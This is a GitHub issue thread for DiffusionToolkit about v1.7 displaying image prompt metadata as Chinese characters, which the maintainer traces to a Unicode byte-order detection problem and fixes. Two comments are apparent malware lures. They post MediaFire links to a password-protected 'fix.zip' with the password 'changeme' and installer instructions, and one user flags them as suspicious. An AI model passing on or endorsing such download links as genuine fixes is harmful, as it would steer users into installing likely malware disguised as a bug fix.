### ISSUE TITLE
[BUG] Metadata is shown in chinese

### ISSUE THREAD

**Issue by acorderob** [RupertAvery/DiffusionToolkit#253]
**Describe the bug**
After updating to v1.7 the metadata is shown in chinese characters. Probably a wrong encoding detection when reading the jpg exif metadata.

**Version:**
1.7

**Tool:**
forge or reforge.

**To Reproduce**
Just updating to 1.7

**Expected behavior**
Metadata should be read correctly.

**Affected Image(s)**
-

**Screenshots**
This is how it shows it:
![image](https://github.com/user-attachments/assets/6ff21a3b-52c4-4147-8a9b-9c43bc73f2bc)

This is the start of the image file.
![image](https://github.com/user-attachments/assets/6e7cbd98-41d1-493d-9bbb-1c32498a52c5)

**Additional context**

**Comment by QAQ330** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dexth67** [comment]
I have the same issue

**Comment by acorderob** [comment]
> Download https://.../file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

@RupertAvery I'm guessing this wasn't you. You should delete that comment, just in case it's malware.

**Comment by evanerichards** [comment]
I'm experiencing this same issue. It seems like it's happening with some of the Auto1111 prompts both SDXL and 1.5 prompts.

**Comment by Aamir3d** [comment]
Same issue so not creating a new ticket.
![image](https://github.com/user-attachments/assets/2c6a6175-fa2f-43e4-a32d-70d0dcf2b0f5)

**Comment by RupertAvery** [comment]
@acorderob , I will need an actual image, if you can attach them here, github does not remove metadata. If they are nsfw, please give me a link where I can download them.

**Comment by acorderob** [comment]
![00017-sdxlNuclearGeneralPurposeV3Semi_v30-DPM++ 2M Karras-S30-C30-CS2-3261352871-3840x2160-17056659](https://github.com/user-attachments/assets/2b0787c8-51aa-4566-a805-0cecd54226ae)

**Comment by Aamir3d** [comment]
This image has Chinese characters in the prompt display
![00205-3334551669 0-rave against the machine, splash art, wallpaper, WLOP, full focus, professional, highly detailed, perfect lighting; Digital Illu](https://github.com/user-attachments/assets/49a518e3-3660-4865-95cd-d6ec945a64a1)

This image displays a regular prompt
![00149-2345574745-Super sharp Environmental shot of  white and grey Cyborg in a cluttered and messy shack, sci fi spare parts in background  vibra](https://github.com/user-attachments/assets/61541549-83c6-4bd0-b2d4-9dc3519b5dad)

Not sure if it's related but I just noticed image-image outputs have normal prompts, but images from text2image have Chinese prompts.

**Comment by RupertAvery** [comment]
I've discovered the issue, looks like a fix I made for a previous bug also showing Chinese characters broke previously working images.

It's to do with the encoding. Some generators use BigEndian Unicode and other use plain Unicode.  The library I use really doesn't have a way to distinguish between them really, but I have a sort of workaround for it.

**Comment by acorderob** [comment]
This version works, thanks. I find it odd that the saving of the images do not add a proper BOM in the EXIF metadata. Maybe something to ask in the WebUIs discussion boards.

**Comment by RupertAvery** [comment]
Perhaps the latest version should fix new images not being detected

https://github.com/RupertAvery/DiffusionToolkit/actions/runs/10570167410/artifacts/1857454833

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Aamir3d** [comment]
@RupertAvery thank you - the latest version has correct prompt display and can add images.
